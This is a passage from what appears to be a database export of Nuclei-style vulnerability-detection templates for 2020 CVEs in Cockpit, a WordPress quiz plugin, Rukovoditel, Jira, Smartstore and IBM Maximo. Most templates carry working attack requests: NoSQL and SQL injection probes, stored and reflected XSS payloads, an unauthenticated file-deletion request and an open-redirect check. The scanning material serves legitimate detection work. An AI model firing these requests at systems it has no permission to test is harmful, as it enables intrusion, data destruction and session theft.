vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service.\n remediation: |\n Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/rce-cockpit-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35847\n - https://getcockpit.com/\n - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466\n - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35847\n cwe-id: CWE-89\n epss-score: 0.77399\n epss-percentile: 0.98139\n cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: agentejo\n product: cockpit\n shodan-query: http.favicon.hash:688609340\n tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo\n\nhttp:\n - raw:\n - |\n POST /auth/requestreset HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"user\": {\n \"$func\": \"var_dump\"\n }\n }\n - |\n POST /auth/requestreset HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"user\": {\n \"$func\": \"nonexistent_function\"\n }\n }\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body_1\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\"'\n\n - type: regex\n part: body_1\n negative: true\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\"'\n\n - type: regex\n part: body_2\n negative: true\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\"'\n# digest: 4b0a00483046022100b22461d6f3fb20ee41694adc4d1a172d49954b2fd5e4ffe9b471b7245fc3ebe2022100cf54164abf938038a87d987cc754a82f7fb0325896c2bfe719cb9dd70c139aa1:922c64590222798bb761d5b6d8e72950", "hash": "202a44bad9a10cc9a57bfaade5bff4dc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308215" }, "name": "CVE-2020-35848.yaml", "content": "id: CVE-2020-35848\n\ninfo:\n name: Agentejo Cockpit <0.12.0 - NoSQL Injection\n author: dwisiswant0\n severity: critical\n description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.\n remediation: |\n Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/rce-cockpit-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35848\n - https://getcockpit.com/\n - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466\n - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35848\n cwe-id: CWE-89\n epss-score: 0.75372\n epss-percentile: 0.98077\n cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: agentejo\n product: cockpit\n tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/auth/newpassword\"\n\n body: |\n {\n \"token\": {\n \"$func\": \"var_dump\"\n }\n }\n\n headers:\n Content-Type: application/json\n matchers:\n - type: regex\n part: body\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\"'\n# digest: 4a0a0047304502204c5e621f8e72efbb78024a1d448302c1b840c428b84bd1d8c46c91a239f8fae40221008c5563e6e9537a8190b64c882918cb880fa670f4410e0ff17c0d132bd4ffb4ab:922c64590222798bb761d5b6d8e72950", "hash": "981254ab02e2b1ef511e5f7fb90ab75d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308216" }, "name": "CVE-2020-35951.yaml", "content": "id: CVE-2020-35951\n\ninfo:\n name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion\n author: princechaddha\n severity: critical\n description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).\n impact: |\n This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.\n remediation: |\n Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.\n reference:\n - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35951\n - https://wpscan.com/vulnerability/10348\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\n cvss-score: 9.9\n cve-id: CVE-2020-35951\n cwe-id: CWE-306\n epss-score: 0.00174\n epss-percentile: 0.54591\n cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 4\n vendor: expresstech\n product: quiz_and_survey_master\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n ------WebKitFormBoundaryBJ17hSJBjuGrnW92\n Content-Disposition: form-data; name=\"action\"\n\n qsm_remove_file_fd_question\n ------WebKitFormBoundaryBJ17hSJBjuGrnW92\n Content-Disposition: form-data; name=\"file_url\"\n\n {{fullpath}}wp-content/plugins/quiz-master-next/README.md\n ------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n - |\n GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')\n\n - type: word\n part: body\n words:\n - '{\"type\":\"success\",\"message\":\"File removed successfully\"}'\n\n extractors:\n - type: regex\n name: fullpath\n group: 1\n regex:\n - not found in ([/a-z_]+)wp\n internal: true\n part: body\n# digest: 4a0a00473045022047234f08b1f0792ea387973f0968ea443be70b6f41de22d81bfae5f90b1cfed1022100d0e2e333c645375e750cd51761840100ba349328a6f6922f694250ae9a2dc721:922c64590222798bb761d5b6d8e72950", "hash": "7fb54196e537065a33fc3cbc07eb049f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308217" }, "name": "CVE-2020-35984.yaml", "content": "id: CVE-2020-35984\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/4\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35984\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35984\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.46456\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100c093406f2e20ab363ad2e5b2e58e612c32e582979f5b76239ee293f40c516cf3022100bc62dd62624a4844c2599ec0db7386bdb99d72bf47b9f60294a335e73d51f719:922c64590222798bb761d5b6d8e72950", "hash": "065ad9e646197d2fa7da862e68548d55", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308218" }, "name": "CVE-2020-35985.yaml", "content": "id: CVE-2020-35985\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Global Lists\" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/3\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35985\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35985\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.46456\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=global_lists/lists&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a0047304502201a053b9e5d1b3b39b3a63962bbb73e3bd1ae057df9bb6bbd8c70a1c54e5c889a022100dbfd8d43414776fb81d37e2acca5ce6f22a4a9ae227720b8a0c06c123a48656b:922c64590222798bb761d5b6d8e72950", "hash": "d4c88a1d829c883f851917296dbd4507", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308219" }, "name": "CVE-2020-35986.yaml", "content": "id: CVE-2020-35986\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/2\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35986\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35986\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.46456\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a00463044022001a1db1ce282848e286180a36258ba7a97e9ebcfd5e3bf04752665acd1be726002201be28513e9cf09e79f866ea38c6862b1004f5f20e60512c3903a76150fee9ca2:922c64590222798bb761d5b6d8e72950", "hash": "9d0b8bef0d1345086efc1a19dcbe43d3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821a" }, "name": "CVE-2020-35987.yaml", "content": "id: CVE-2020-35987\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/1\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35987\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35987\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.47225\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a004630440220008f7be9d19095521ee732eedcd00db1cb6c0d5ce2bfc3285e09975ecfb877fd022006d98c7cde4454aff8c6e3c19f73f57edf1f276ad7caf1c2808c837efdfcf07e:922c64590222798bb761d5b6d8e72950", "hash": "5d134a5055028eafc3c5024e17fc53fa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821b" }, "name": "CVE-2020-36112.yaml", "content": "id: CVE-2020-36112\n\ninfo:\n name: CSE Bookstore 1.0 - SQL Injection\n author: geeknik\n severity: critical\n description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49314\n - https://www.tenable.com/cve/CVE-2020-36112\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36112\n - https://github.com/StarCrossPortal/scalpel\n - https://github.com/anonymous364872/Rapier_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-36112\n cwe-id: CWE-89\n epss-score: 0.40407\n epss-percentile: 0.9718\n cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cse_bookstore_project\n product: cse_bookstore\n tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project\n\nhttp:\n - raw:\n - |\n GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body\n words:\n - \"get book price failed! You have an error in your SQL syntax\"\n - \"Can't retrieve data You have an error in your SQL syntax\"\n condition: or\n# digest: 4a0a0047304502206fa2676792b348fc60ebc9cc70b869fe76ef0386dc78c9e96e3249d4a5cfbc370221008c90f9a9894fb5a251d8ebb984a710b6c11de3f64f43f866135bca21ff6b735e:922c64590222798bb761d5b6d8e72950", "hash": "d7ae19b433600dbbe56a31df725579ca", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821c" }, "name": "CVE-2020-36289.yaml", "content": "id: CVE-2020-36289\n\ninfo:\n name: Jira Server and Data Center - Information Disclosure\n author: dhiyaneshDk\n severity: medium\n description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.\n reference:\n - https://twitter.com/ptswarm/status/1402644004781633540\n - https://jira.atlassian.com/browse/JRASERVER-71559\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36289\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-36289\n cwe-id: CWE-863\n epss-score: 0.91164\n epss-percentile: 0.98655\n cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: atlassian\n product: data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,jira,atlassian,unauth\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'\n - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'rel=\\\"admin\\\"'\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100898e394070c92c7a02d36dcfc81e5aab7fa675d1b34ee54ef3f7b0695240db83022100dc4514faa3631043b8720e95822353c897a7fd577c593cf8dac8ee1b12e9e20e:922c64590222798bb761d5b6d8e72950", "hash": "407df7fd3d1ca51ece484e46d027d34f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821d" }, "name": "CVE-2020-36365.yaml", "content": "id: CVE-2020-36365\n\ninfo:\n name: Smartstore <4.1.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Smartstore (aka \"SmartStoreNET\") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability.\n reference:\n - https://github.com/smartstore/SmartStoreNET/issues/2113\n - https://github.com/smartstore/SmartStoreNET\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36365\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-36365\n cwe-id: CWE-601\n epss-score: 0.00244\n epss-percentile: 0.62379\n cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: smartstore\n product: smartstorenet\n shodan-query: http.html:'content=\"Smartstore'\n tags: cve2020,cve,redirect,smartstore\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950", "hash": "ad6c7eeb54ce6b355fa9f40cc4b86cd5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821e" }, "name": "CVE-2020-36510.yaml", "content": "id: CVE-2020-36510\n\ninfo:\n name: WordPress 15Zine <3.3.0 - Cross-Site Scripting\n author: veshraj\n severity: medium\n description: |\n WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36510\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-36510\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"false\"\n max-request: 1\n vendor: codetipi\n product: 15zine\n framework: wordpress\n tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/themes/15zine/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/15zine/assets/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c1ef38f0b31cc4796a572017f5aa569d3ca8d69d5db61193a22056a2fa4b791102205dd37e9b2682478a3d9d1e057acfd977eae5d1ccfd95e114c39457cc26e9b90e:922c64590222798bb761d5b6d8e72950", "hash": "cf7eb3af215df50bcf9f53acc8a7dc08", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821f" }, "name": "CVE-2020-4463.yaml", "content": "id: CVE-2020-4463\n\ninfo:\n name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection\n author: dwisiswant0\n severity: high\n description: |\n IBM Maximo Asset Management is vulnerable to an\n XML external entity injection (XXE) attack when processing XML data.\n A remote attacker could exploit this vulnerability to expose\n sensitive information or consume memory resources.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive information or a denial of service.\n remediation: |\n Apply the latest security patches or updates provided by IBM to mitigate the vulnerability.\n reference:\n - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463\n - https://github.com/Ibonok/CVE-2020-4463\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484\n - https://www.ibm.com/support/pages/node/6253953\n - https://nvd.nist.gov/vuln/detail/CVE-2020-4463\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L\n cvss-score: 8.2\n cve-id: CVE-2020-4463\n cwe-id: CWE-611\n epss-score: 0.76538\n epss-percentile: 0.97916\n cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: ibm\n product: maximo_asset_management\n shodan-query: http.favicon.hash:-399298961\n tags: cve,cve2020,ibm,xxe,disclosure\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/os/mxperson\"\n - \"{{BaseURL}}/meaweb/os/mxperson\"\n\n body: |\n \n \n \n \n\n headers:\n Content-Type: \"application/xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"QueryMXPERSONResponse\"\n - \"MXPERSONSet\"\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n# digest: 4b0a00483046022100d058bbbb18f9fcaf0793777079b5c78305acfdad26be6dd11135dfa666fb92b60221009914324daf438c22b331865eda5e672cc52bc7a691d94bca7a4eb59450bc5a3e:922c64590222798bb761d5b6d8e72950", "hash": "c83a3897128bbe8e7d8c1869dfd278f8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308220" }, "name": "CVE-2020-5191.yaml", "content": "id: CVE-2020-5191\n\ninfo:\n name: PHPGurukul Hospital Management System - Cross-Site Scripting\n author: TenBird\n severity: medium\n description: |\n PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/47841\n - https://phpgurukul.com/hospital-management-system-in-php/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5191\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-5191\n cwe-id: CWE-79\n epss-score: 0.00345\n epss-percentile: 0.68617\n cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: hospital_management_system\n tags: 